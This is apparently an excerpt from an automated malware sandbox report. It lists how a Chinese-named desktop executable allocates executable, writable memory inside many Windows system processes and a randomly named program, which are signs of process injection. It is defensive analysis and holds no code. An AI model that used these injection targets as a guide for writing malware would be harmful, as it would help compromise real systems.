        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SysWOW64\cscript.exe base: 4980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SysWOW64\cscript.exe base: 49E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 590000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 570000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2410000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 27F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2940000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2350000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 26A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2550000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 25A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 30D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1270000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2080000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 20D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1080000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1090000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2720000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2770000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 570000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2840000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1080000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1090000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 26B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: CE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1480000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 3230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21C0000 protect: page execute and read and writeJump to behavior
